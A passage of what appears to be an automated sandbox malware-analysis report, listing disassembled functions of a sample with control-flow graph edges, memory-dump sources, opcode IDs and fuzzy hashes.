                                                                    control_flow_graph 39 7ffd9bbd1f85-7ffd9bbd2063 GetFileAttributesW 43 7ffd9bbd206b-7ffd9bbd20a9 39->43 44 7ffd9bbd2065 39->44 44->43
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1674632989.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9bbc0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    • Opcode ID: 510b72589b6c27fdf96c4fd1c3f0d87e810ef1ff2aee2e059473b0cbd5350027
                                                                    • Instruction ID: e34c0e231d20ab44060e79ac519cf49e4126aa01724b1bd98cba3fd9e8f3495f
                                                                    • Opcode Fuzzy Hash: 510b72589b6c27fdf96c4fd1c3f0d87e810ef1ff2aee2e059473b0cbd5350027
                                                                    • Instruction Fuzzy Hash: 44410870E08A4C8FDB98EF98D895BEDBBF0FB59310F14416AD009E7252DA75A885CF41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0FB3F8 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID: 0-3916222277
                                                                    • Opcode ID: 18770c06ba62d7a343a05f1f48f72ab91c9c0e12eb358fd141804b5a3e4b3221
                                                                    • Instruction ID: 0d3e0523fbef00ff89fef5ba4eebc131c728917a43067b8bc62d03fc47f70008
                                                                    • Opcode Fuzzy Hash: 18770c06ba62d7a343a05f1f48f72ab91c9c0e12eb358fd141804b5a3e4b3221
                                                                    • Instruction Fuzzy Hash: D1515D71F0854A8FDB69DB98C4A06BDBBB1EF54340F1040BAD05EE72D6CB396945CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA116D3 Relevance: 1.3, Strings: 1, Instructions: 49COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 82 7ffd9ba116d3-7ffd9ba2fad5 88 7ffd9ba2fad7 82->88 89 7ffd9ba2fadc-7ffd9ba2fae1 call 7ffd9ba116e0 82->89 88->89 91 7ffd9ba2fae6-7ffd9ba2faf1 89->91
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1671529877.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba10000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: -M_^
                                                                    • API String ID: 0-3132001028
                                                                    • Opcode ID: a73b366bd5c8370711c7ac80d5322fe483585b05b3cc735295b2bacbc9919b77
                                                                    • Instruction ID: 5a19e74d47f8a0811980f568f84a64283b7dbe8954ee85b32aecdb3b0e3a5d01
                                                                    • Opcode Fuzzy Hash: a73b366bd5c8370711c7ac80d5322fe483585b05b3cc735295b2bacbc9919b77
                                                                    • Instruction Fuzzy Hash: 1101A735B0E24E9FE711FF68A8A19ED7BA0EF01324F0902B6E45DC2096E9256618C791
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0FD150 Relevance: 1.1, Instructions: 1053COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 92 7ffd9c0fd150 93 7ffd9c0fd155-7ffd9c0fd161 92->93 94 7ffd9c0fd186 93->94 95 7ffd9c0fd18a 94->95 96 7ffd9c0fd18c-7ffd9c0fd1a1 95->96 97 7ffd9c0fd16a 95->97 104 7ffd9c0fd1a2 96->104 98 7ffd9c0fd16c-7ffd9c0fd181 97->98 99 7ffd9c0fd14a 97->99 108 7ffd9c0fd182 98->108 101 7ffd9c0fd14c-7ffd9c0fd14e 99->101 102 7ffd9c0fd12a 99->102 101->92 105 7ffd9c0fd12c 102->105 106 7ffd9c0fd10a-7ffd9c0fd112 102->106 107 7ffd9c0fd1a4-7ffd9c0fd1a6 104->107 104->108 105->99 110 7ffd9c0fd114-7ffd9c0fd122 106->110 111 7ffd9c0fd0f2-7ffd9c0fd0fb 106->111 117 7ffd9c0fd1aa 107->117 114 7ffd9c0fd184-7ffd9c0fd185 108->114 115 7ffd9c0fd162-7ffd9c0fd168 108->115 112 7ffd9c0fd102 110->112 113 7ffd9c0fd124 110->113 111->112 118 7ffd9c0fd104-7ffd9c0fd106 112->118 119 7ffd9c0fd0e2 112->119 113->102 114->94 115->97 117->95 122 7ffd9c0fd1ac-7ffd9c0fd1c2 117->122 118->106 120 7ffd9c0fd0e4 119->120 121 7ffd9c0fd0c2-7ffd9c0fd0c9 119->121 120->111 123 7ffd9c0fd0cc-7ffd9c0fd0d9 121->123 124 7ffd9c0fd0cb 121->124 122->104 126 7ffd9c0fd1c4-7ffd9c0fd1c9 122->126 124->123 126->117 127 7ffd9c0fd1ca 126->127 127->117 128 7ffd9c0fd1cc-7ffd9c0fd1d9 127->128 129 7ffd9c0fd1db-7ffd9c0fd1e1 128->129 130 7ffd9c0fd24d-7ffd9c0fd251 128->130 132 7ffd9c0fd20a 129->132 133 7ffd9c0fd252 130->133 134 7ffd9c0fd20b-7ffd9c0fd211 132->134 135 7ffd9c0fd1ea 132->135 137 7ffd9c0fd254-7ffd9c0fd271 133->137 138 7ffd9c0fd232 133->138 136 7ffd9c0fd212 134->136 135->127 139 7ffd9c0fd1ec-7ffd9c100dbb 135->139 140 7ffd9c0fd214-7ffd9c0fd231 136->140 141 7ffd9c0fd1f2-7ffd9c0fd209 136->141 153 7ffd9c0fd272 137->153 138->136 142 7ffd9c0fd234-7ffd9c0fd24a 138->142 146 7ffd9c100dc0-7ffd9c100dc7 139->146 140->138 141->132 142->130 146->146 147 7ffd9c100dc9-7ffd9c101156 146->147 150 7ffd9c106540-7ffd9c106576 147->150 158 7ffd9c106577 150->158 153->133 154 7ffd9c0fd274-7ffd9c0fd291 153->154 160 7ffd9c0fd292 154->160 158->158 160->153 161 7ffd9c0fd294-7ffd9c0fd2b1 160->161 165 7ffd9c0fd2b2 161->165 165->160 166 7ffd9c0fd2b4-7ffd9c0fd2d1 165->166 169 7ffd9c0fd344-7ffd9c0fd351 166->169 171 7ffd9c0fd352 169->171 172 7ffd9c0fd354-7ffd9c0fd371 171->172 173 7ffd9c0fd332 171->173 188 7ffd9c0fd372 172->188 174 7ffd9c0fd334-7ffd9c0fd33e 173->174 175 7ffd9c0fd312 173->175 174->169 176 7ffd9c0fd314-7ffd9c0fd331 175->176 177 7ffd9c0fd2f2 175->177 176->173 180 7ffd9c0fd2f4-7ffd9c0fd311 177->180 181 7ffd9c0fd2d2 177->181 180->175 181->165 184 7ffd9c0fd2d4-7ffd9c0fd2ee 181->184 184->177 188->171 191 7ffd9c0fd374-7ffd9c0fd38e 188->191 196 7ffd9c0fd392 191->196 196->188 197 7ffd9c0fd394-7ffd9c0fd3b1 196->197 201 7ffd9c0fd3b2 197->201 201->196 202 7ffd9c0fd3b4-7ffd9c0fd3d1 201->202 206 7ffd9c0fd443-7ffd9c0fd451 202->206 208 7ffd9c0fd452 206->208 209 7ffd9c0fd454-7ffd9c0fd472 208->209 210 7ffd9c0fd432 208->210 209->208 225 7ffd9c0fd474-7ffd9c0fd641 209->225 211 7ffd9c0fd434-7ffd9c0fd43e 210->211 212 7ffd9c0fd412 210->212 211->206 214 7ffd9c0fd414-7ffd9c0fd42e 212->214 215 7ffd9c0fd3f2 212->215 214->210 216 7ffd9c0fd3f4-7ffd9c0fd411 215->216 217 7ffd9c0fd3d2 215->217 216->212 217->201 219 7ffd9c0fd3d4-7ffd9c0fd3f1 217->219 250 7ffd9c0fd643-7ffd9c0fd6af 225->250 251 7ffd9c0fd6b1-7ffd9c0fd6d9 225->251 250->251 258 7ffd9c0fd6db-7ffd9c0fd746 251->258 259 7ffd9c0fd748-7ffd9c0fd7d9 251->259 258->259 284 7ffd9c0fd7db-7ffd9c0fd845 259->284 285 7ffd9c0fd847-7ffd9c0fd849 259->285 284->285 286 7ffd9c0fd84b-7ffd9c0fd859 285->286 287 7ffd9c0fd8b7-7ffd9c0fd8d9 285->287 294 7ffd9c0fd85b-7ffd9c0fd87d 286->294 295 7ffd9c0fd87e-7ffd9c0fd891 286->295 292 7ffd9c0fd8db-7ffd9c0fd8f1 287->292 293 7ffd9c0fd946-7ffd9c0fd94d 287->293 297 7ffd9c0fd916-7ffd9c0fd929 292->297 298 7ffd9c0fd8f3-7ffd9c0fd8f9 292->298 305 7ffd9c0fd94e-7ffd9c0fd95d 293->305 294->295 309 7ffd9c0fd8b6 295->309 310 7ffd9c0fd893-7ffd9c0fd8b5 295->310 297->305 306 7ffd9c0fd92b-7ffd9c0fd92d 297->306 320 7ffd9c0fd95e-7ffd9c0fd980 305->320 311 7ffd9c0fd92f-7ffd9c0fd939 306->311 312 7ffd9c0fd92e 306->312 309->287 310->287 311->320 321 7ffd9c0fd93b-7ffd9c0fd941 311->321 312->311 320->150 326 7ffd9c0fd943 321->326 327 7ffd9c0fd9ae-7ffd9c0fdacf 321->327 326->293 345 7ffd9c0fdad1-7ffd9c0fdad5 call 7ffd9c0f8ca0 327->345 347 7ffd9c0fdada 345->347 349 7ffd9c0fdadc-7ffd9c0fdaf3 347->349 350 7ffd9c0fdaf9-7ffd9c0fdafd 349->350 350->150 351 7ffd9c0fdaac-7ffd9c0fdac1 350->351
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 900fb79be5a8f306a3874711ea6809d3535141979650802b2c55c13aa327b842
                                                                    • Instruction ID: 2894dae66802a2252f237fb64074e24f7d04d4ac33116ed8135ab06595ee1e66
                                                                    • Opcode Fuzzy Hash: 900fb79be5a8f306a3874711ea6809d3535141979650802b2c55c13aa327b842
                                                                    • Instruction Fuzzy Hash: 5472EB22F0D3675BF712BBACE8F58E67BB0DF02368B0941B7D45D8A0D3D91A64858385
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0F06B1 Relevance: .4, Instructions: 408COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 662 7ffd9c0f06b1 663 7ffd9c0f06b6-7ffd9c0f06be 662->663 664 7ffd9c0f06c4-7ffd9c0f06d6 call 7ffd9c0f0080 663->664 665 7ffd9c0f0841-7ffd9c0f0855 663->665 670 7ffd9c0f06d8-7ffd9c0f06dd 664->670 671 7ffd9c0f06a5-7ffd9c0f06ac 664->671 666 7ffd9c0f085c-7ffd9c0f0867 665->666 667 7ffd9c0f0857 665->667 667->666 672 7ffd9c0f06ff-7ffd9c0f0710 670->672 673 7ffd9c0f06df-7ffd9c0f06e3 670->673 674 7ffd9c0f0880-7ffd9c0f0885 671->674 677 7ffd9c0f088a-7ffd9c0f08a5 672->677 678 7ffd9c0f0716-7ffd9c0f072b 672->678 675 7ffd9c0f06e9-7ffd9c0f06fa 673->675 676 7ffd9c0f07e3-7ffd9c0f07f4 673->676 674->662 675->665 680 7ffd9c0f07fb-7ffd9c0f0806 676->680 681 7ffd9c0f07f6 676->681 685 7ffd9c0f08a7 677->685 686 7ffd9c0f08ad 677->686 678->677 679 7ffd9c0f0731-7ffd9c0f073d 678->679 683 7ffd9c0f073f-7ffd9c0f0756 679->683 684 7ffd9c0f076e-7ffd9c0f0784 call 7ffd9c0f0080 679->684 681->680 683->676 694 7ffd9c0f075c-7ffd9c0f076b 683->694 684->676 692 7ffd9c0f0786-7ffd9c0f0791 684->692 685->686 688 7ffd9c0f08b1-7ffd9c0f0913 686->688 689 7ffd9c0f08af 686->689 704 7ffd9c0f08db-7ffd9c0f0917 688->704 705 7ffd9c0f091e-7ffd9c0f093c 688->705 689->688 692->677 695 7ffd9c0f0797-7ffd9c0f07ac 692->695 694->684 695->677 697 7ffd9c0f07b2-7ffd9c0f07c5 695->697 701 7ffd9c0f0819-7ffd9c0f0821 697->701 702 7ffd9c0f07c7-7ffd9c0f07e1 697->702 707 7ffd9c0f0829-7ffd9c0f082c 701->707 702->676 711 7ffd9c0f0807-7ffd9c0f0816 702->711 720 7ffd9c0f08f5-7ffd9c0f0910 704->720 721 7ffd9c0f093e-7ffd9c0f0970 704->721 708 7ffd9c0f0833-7ffd9c0f083b 707->708 708->665 713 7ffd9c0f067a-7ffd9c0f0687 708->713 711->701 713->708 716 7ffd9c0f068d-7ffd9c0f06a1 713->716 716->708 723 7ffd9c0f0a58-7ffd9c0f0a5d 721->723 727 7ffd9c0f098c-7ffd9c0f0a67 723->727 728 7ffd9c0f0a71-7ffd9c0f0a8f 723->728 736 7ffd9c0f09b6-7ffd9c0f09b9 727->736 737 7ffd9c0f0a3d-7ffd9c0f0a55 727->737 736->737 739 7ffd9c0f09bf-7ffd9c0f09c2 736->739 737->723 740 7ffd9c0f0a2b-7ffd9c0f0a32 739->740 741 7ffd9c0f09c4-7ffd9c0f09f1 739->741 742 7ffd9c0f0a34-7ffd9c0f0a3c 740->742 743 7ffd9c0f09f2-7ffd9c0f0a0c 740->743 745 7ffd9c0f0a91-7ffd9c0f0ae1 743->745 746 7ffd9c0f0a12-7ffd9c0f0a1d 743->746 746->745 747 7ffd9c0f0a1f-7ffd9c0f0a29 746->747 747->740
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f65d66c0ee82578cbafa295aaa27359b66a04d7213c14710fe31d40b7fce189d
                                                                    • Instruction ID: 945c1428f50385fa2329be3808240ec1737eaf64a12b0041922612d566cc0f0c
                                                                    • Opcode Fuzzy Hash: f65d66c0ee82578cbafa295aaa27359b66a04d7213c14710fe31d40b7fce189d
                                                                    • Instruction Fuzzy Hash: 61D1CD30B0DA4B8FE3789B68D4A057577F1FF44348F94457EC48E83692DB29B8929B81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0FB66F Relevance: .4, Instructions: 363COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 755 7ffd9c0fb66f-7ffd9c0fb682 756 7ffd9c0fb684-7ffd9c0fb9c5 755->756 757 7ffd9c0fb6ce-7ffd9c0fb6e4 755->757 762 7ffd9c0fb9cf-7ffd9c0fba0e 756->762 759 7ffd9c0fb6ea-7ffd9c0fb6f2 757->759 760 7ffd9c0fb774-7ffd9c0fb7a4 757->760 761 7ffd9c0fb6f8-7ffd9c0fb70a 759->761 759->762 769 7ffd9c0fb7aa-7ffd9c0fb7ab 760->769 770 7ffd9c0fb84e-7ffd9c0fb857 760->770 761->762 764 7ffd9c0fb710-7ffd9c0fb727 761->764 771 7ffd9c0fba10 762->771 767 7ffd9c0fb729-7ffd9c0fb730 764->767 768 7ffd9c0fb767-7ffd9c0fb76e 764->768 767->762 772 7ffd9c0fb736-7ffd9c0fb764 767->772 768->759 768->760 773 7ffd9c0fb7ae-7ffd9c0fb7c4 769->773 774 7ffd9c0fb98f-7ffd9c0fb99d 770->774 775 7ffd9c0fb85d-7ffd9c0fb863 770->775 777 7ffd9c0fba1b-7ffd9c0fbab1 771->777 772->768 773->762 776 7ffd9c0fb7ca-7ffd9c0fb7ee 773->776 778 7ffd9c0fb9a4-7ffd9c0fb9b5 774->778 779 7ffd9c0fb99f 774->779 775->762 780 7ffd9c0fb869-7ffd9c0fb878 775->780 781 7ffd9c0fb841-7ffd9c0fb848 776->781 782 7ffd9c0fb7f0-7ffd9c0fb813 call 7ffd9c0f4318 776->782 789 7ffd9c0fbabc-7ffd9c0fbaff 777->789 790 7ffd9c0fba36-7ffd9c0fbab6 777->790 779->778 784 7ffd9c0fb982-7ffd9c0fb989 780->784 785 7ffd9c0fb87e-7ffd9c0fb885 780->785 781->770 781->773 782->762 795 7ffd9c0fb819-7ffd9c0fb83f 782->795 784->774 784->775 785->762 788 7ffd9c0fb88b-7ffd9c0fb897 call 7ffd9c0f4318 785->788 793 7ffd9c0fb89c-7ffd9c0fb8a7 788->793 802 7ffd9c0fbb01-7ffd9c0fbc07 789->802 790->789 803 7ffd9c0fba58-7ffd9c0fbab8 790->803 796 7ffd9c0fb8a9-7ffd9c0fb8c0 793->796 797 7ffd9c0fb8e6-7ffd9c0fb8f5 793->797 795->781 795->782 796->762 800 7ffd9c0fb8c6-7ffd9c0fb8e2 796->800 797->762 801 7ffd9c0fb8fb-7ffd9c0fb91f 797->801 800->796 804 7ffd9c0fb8e4 800->804 805 7ffd9c0fb922-7ffd9c0fb93f 801->805 830 7ffd9c0fbcec-7ffd9c0fc059 802->830 831 7ffd9c0fbd37-7ffd9c0fbd54 802->831 803->789 813 7ffd9c0fba7c-7ffd9c0fbaba 803->813 809 7ffd9c0fb962-7ffd9c0fb978 804->809 805->762 810 7ffd9c0fb945-7ffd9c0fb960 805->810 809->762 811 7ffd9c0fb97a-7ffd9c0fb97e 809->811 810->805 810->809 811->784 813->789 817 7ffd9c0fba9d-7ffd9c0fbab0 813->817 833 7ffd9c0fc061-7ffd9c0fc0c8 830->833 832 7ffd9c0fbd5a-7ffd9c0fbd69 831->832 831->833 832->830 835 7ffd9c0fbd6b-7ffd9c0fbd6f 832->835 839 7ffd9c0fc238 833->839 835->802 836 7ffd9c0fbd75 835->836 838 7ffd9c0fbdf3-7ffd9c0fbe00 836->838 840 7ffd9c0fbd77-7ffd9c0fbd8f 838->840 841 7ffd9c0fbe06-7ffd9c0fbf66 838->841 839->839 840->838 842 7ffd9c0fbd92 call 7ffd9c0fba00 840->842 842->838
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: eeb7ff646251dbbe698b2a7a50bb5f7a8d73f4d0f0939bac8a9134992ec0578f
                                                                    • Instruction ID: 2ec2572a4c3d5761fc0f74bac034c432b262ed8ccebb4bf2fd0d9a36fb3e4c1b
                                                                    • Opcode Fuzzy Hash: eeb7ff646251dbbe698b2a7a50bb5f7a8d73f4d0f0939bac8a9134992ec0578f
                                                                    • Instruction Fuzzy Hash: 02D19D707186568FEB59CF58C4E06B43BB1FF45350B5446BDC85E8B68ACB38E882DB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0FB68F Relevance: .3, Instructions: 334COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 854 7ffd9c0fb68f-7ffd9c0fb698 855 7ffd9c0fb9cf-7ffd9c0fba10 854->855 856 7ffd9c0fb69e-7ffd9c0fb6af 854->856 869 7ffd9c0fba1b-7ffd9c0fbab1 855->869 857 7ffd9c0fb6c5-7ffd9c0fb6cc 856->857 858 7ffd9c0fb6b1-7ffd9c0fb6b5 856->858 861 7ffd9c0fb684-7ffd9c0fb9c5 857->861 862 7ffd9c0fb6ce-7ffd9c0fb6e4 857->862 858->855 860 7ffd9c0fb6bb-7ffd9c0fb6c3 858->860 860->857 861->855 865 7ffd9c0fb6ea-7ffd9c0fb6f2 862->865 866 7ffd9c0fb774-7ffd9c0fb7a4 862->866 865->855 867 7ffd9c0fb6f8-7ffd9c0fb70a 865->867 875 7ffd9c0fb7aa-7ffd9c0fb7ab 866->875 876 7ffd9c0fb84e-7ffd9c0fb857 866->876 867->855 870 7ffd9c0fb710-7ffd9c0fb727 867->870 880 7ffd9c0fbabc-7ffd9c0fbaff 869->880 881 7ffd9c0fba36-7ffd9c0fbab6 869->881 873 7ffd9c0fb729-7ffd9c0fb730 870->873 874 7ffd9c0fb767-7ffd9c0fb76e 870->874 873->855 877 7ffd9c0fb736-7ffd9c0fb764 873->877 874->865 874->866 879 7ffd9c0fb7ae-7ffd9c0fb7c4 875->879 882 7ffd9c0fb98f-7ffd9c0fb99d 876->882 883 7ffd9c0fb85d-7ffd9c0fb863 876->883 877->874 879->855 884 7ffd9c0fb7ca-7ffd9c0fb7ee 879->884 896 7ffd9c0fbb01-7ffd9c0fbc07 880->896 881->880 897 7ffd9c0fba58-7ffd9c0fbab8 881->897 886 7ffd9c0fb9a4-7ffd9c0fb9b5 882->886 887 7ffd9c0fb99f 882->887 883->855 888 7ffd9c0fb869-7ffd9c0fb878 883->888 889 7ffd9c0fb841-7ffd9c0fb848 884->889 890 7ffd9c0fb7f0-7ffd9c0fb813 call 7ffd9c0f4318 884->890 887->886 892 7ffd9c0fb982-7ffd9c0fb989 888->892 893 7ffd9c0fb87e-7ffd9c0fb885 888->893 889->876 889->879 890->855 905 7ffd9c0fb819-7ffd9c0fb83f 890->905 892->882 892->883 893->855 898 7ffd9c0fb88b-7ffd9c0fb897 call 7ffd9c0f4318 893->898 933 7ffd9c0fbcec-7ffd9c0fc059 896->933 934 7ffd9c0fbd37-7ffd9c0fbd54 896->934 897->880 909 7ffd9c0fba7c-7ffd9c0fbaba 897->909 904 7ffd9c0fb89c-7ffd9c0fb8a7 898->904 906 7ffd9c0fb8a9-7ffd9c0fb8c0 904->906 907 7ffd9c0fb8e6-7ffd9c0fb8f5 904->907 905->889 905->890 906->855 910 7ffd9c0fb8c6-7ffd9c0fb8e2 906->910 907->855 911 7ffd9c0fb8fb-7ffd9c0fb91f 907->911 909->880 919 7ffd9c0fba9d-7ffd9c0fbab0 909->919 910->906 915 7ffd9c0fb8e4 910->915 916 7ffd9c0fb922-7ffd9c0fb93f 911->916 917 7ffd9c0fb962-7ffd9c0fb978 915->917 916->855 918 7ffd9c0fb945-7ffd9c0fb960 916->918 917->855 921 7ffd9c0fb97a-7ffd9c0fb97e 917->921 918->916 918->917 921->892 936 7ffd9c0fc061-7ffd9c0fc0c8 933->936 935 7ffd9c0fbd5a-7ffd9c0fbd69 934->935 934->936 935->933 938 7ffd9c0fbd6b-7ffd9c0fbd6f 935->938 942 7ffd9c0fc238 936->942 938->896 939 7ffd9c0fbd75 938->939 941 7ffd9c0fbdf3-7ffd9c0fbe00 939->941 943 7ffd9c0fbd77-7ffd9c0fbd8f 941->943 944 7ffd9c0fbe06-7ffd9c0fbf66 941->944 942->942 943->941 945 7ffd9c0fbd92 call 7ffd9c0fba00 943->945 945->941
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8cbf905a3ffbbe8cd381a999a736a3bae174a308076b2e35c4a9ab2b145c8fcc
                                                                    • Instruction ID: f8dd31ac04e731f6d2a03081868cd11bb819586240694c0397235db7f1ad2e73
                                                                    • Opcode Fuzzy Hash: 8cbf905a3ffbbe8cd381a999a736a3bae174a308076b2e35c4a9ab2b145c8fcc
                                                                    • Instruction Fuzzy Hash: D0C19C707186568BEB29CF58C4A05B53BB1FF45350B5485BDC89E8B6CACB38E881DB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0F86FA Relevance: .3, Instructions: 313COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 957 7ffd9c0f86fa-7ffd9c0f88fb 963 7ffd9c0f8906-7ffd9c0f8998 957->963 978 7ffd9c0f896a-7ffd9c0f8979 call 7ffd9c0f899a 963->978 979 7ffd9c0f8940-7ffd9c0f8969 963->979 979->978
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1fcaf90b54a474fc8cb932b6ba1e938ca0e5cb63993af86bb458e61158ecd6ba
                                                                    • Instruction ID: a05082376b1cc6fa4209e0c79e0166f6873cd55bb5caea10d99333d565db6824
                                                                    • Opcode Fuzzy Hash: 1fcaf90b54a474fc8cb932b6ba1e938ca0e5cb63993af86bb458e61158ecd6ba
                                                                    • Instruction Fuzzy Hash: 5831A421F0C99B8FE775DB9485661F877F0EF06394F1802BAD05EC61C2CB796884A742
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0FE03F Relevance: .3, Instructions: 299COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 51aefd47987c34ea647c123d374ee32c6ba4039d6e81525131c920771593074b
                                                                    • Instruction ID: 1b741ba83e9f89a8f54677db57d95a14824ad2909f0720a7159a3f282544a098
                                                                    • Opcode Fuzzy Hash: 51aefd47987c34ea647c123d374ee32c6ba4039d6e81525131c920771593074b
                                                                    • Instruction Fuzzy Hash: 6D410522F0C62781F3353BD8B0798F927A09F083E4F194576D86E861C7DE5E78C46282
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0FE0D4 Relevance: .3, Instructions: 274COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1a7e39fa753219f0ec328ca194c50ccf6acd7c0e69fabc1d6ecceda3dc3d2e02
                                                                    • Instruction ID: 656b67ac0d6ae131b542669279f1259add09d8e47aa8319e2e458ba095f3c0dc
                                                                    • Opcode Fuzzy Hash: 1a7e39fa753219f0ec328ca194c50ccf6acd7c0e69fabc1d6ecceda3dc3d2e02
                                                                    • Instruction Fuzzy Hash: 6711C612F0D19786F77956E864390BC1EB06F597D0F1801BBD9AE821C2DE8C78C03382
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0FFBF6 Relevance: .3, Instructions: 266COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 23a76457532c8045baf844adfb8a6a302fd867a69ab12bc1e5bf878b9403b408
                                                                    • Instruction ID: fa437b5fc75da67c73ed8e743ad0795bcf8146402033febc07497fa40701c8f3
                                                                    • Opcode Fuzzy Hash: 23a76457532c8045baf844adfb8a6a302fd867a69ab12bc1e5bf878b9403b408
                                                                    • Instruction Fuzzy Hash: 11813631B0CA434FE778AA58946507977F1EF95394F14057ED88EC7283CF28B8829791
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0FA466 Relevance: .3, Instructions: 261COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
